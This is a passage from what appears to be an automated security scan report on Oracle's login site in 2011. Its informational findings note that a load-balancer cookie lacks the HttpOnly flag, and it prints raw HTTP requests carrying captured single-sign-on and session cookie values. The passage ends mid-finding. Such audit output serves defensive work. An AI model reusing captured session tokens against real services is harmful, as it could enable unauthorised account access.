OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:19 GMT Accept-Ranges: bytes Content-Length: 45 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCUu6uHK6EVADUS1EHWFB01t_dK X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/ GIF89a.............!.......,...........D..Y.;
13.97. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/ip-o-logo.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/ip-o-logo.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:19 GMT Accept-Ranges: bytes Content-Length: 1728 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCUU6uHK6EVADUS1EHWFB01t_dJ X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/ GIF89ar..........22................BB.......................................................................................................__.............................................................[SNIP]...
13.98. https://login.oracle.com/mysso/sso_loginui/loginStyling.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/loginStyling.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/loginStyling.css HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:14 GMT Accept-Ranges: bytes Content-Length: 14395 Content-Type: text/css Last-Modified: Thu, 21 Jul 2011 20:04:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBQw6uHK6EVADUS1EHWFB01t_bN X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ /* Desktop Version */ body{font-family:Arial, Helvetica, sans-serif;} .Mwrapper{ display:none;} .wrapper{ display:block;margin:0px auto;width:974px; } .logo-header{float:left; width:974px; height:50px...[SNIP]...
13.99. https://login.oracle.com/mysso/sso_loginui/moc_lib.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/moc_lib.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/moc_lib.js HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:14 GMT Accept-Ranges: bytes Content-Length: 5959 Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBR06uHK6EVADUS1EHWFB01t_bO X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ //-- moc_lib.js: Core JS library for www.oracle.com var ORA_UCM_INFO; //-- Function Library // to populate the user name -------------------------------------------------// function PopulateLogin()...[SNIP]...
13.100. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/oracle-footer-tagline.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/oracle-footer-tagline.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:18 GMT Accept-Ranges: bytes Content-Length: 1711 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCTJ6uHK6EVADUS1EHWFB01t_dG X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/ GIF89a.."........""fff......"""...UUUDDD.UU....33.ww.......ff..................www......333.DD...............!.......,......"......u^).e...w.p,....M.tA.....W+.S7...J2.P.r5.YG..c..z"..X."...4....~..CZ....[SNIP]...
13.101. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/oralogo_small.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
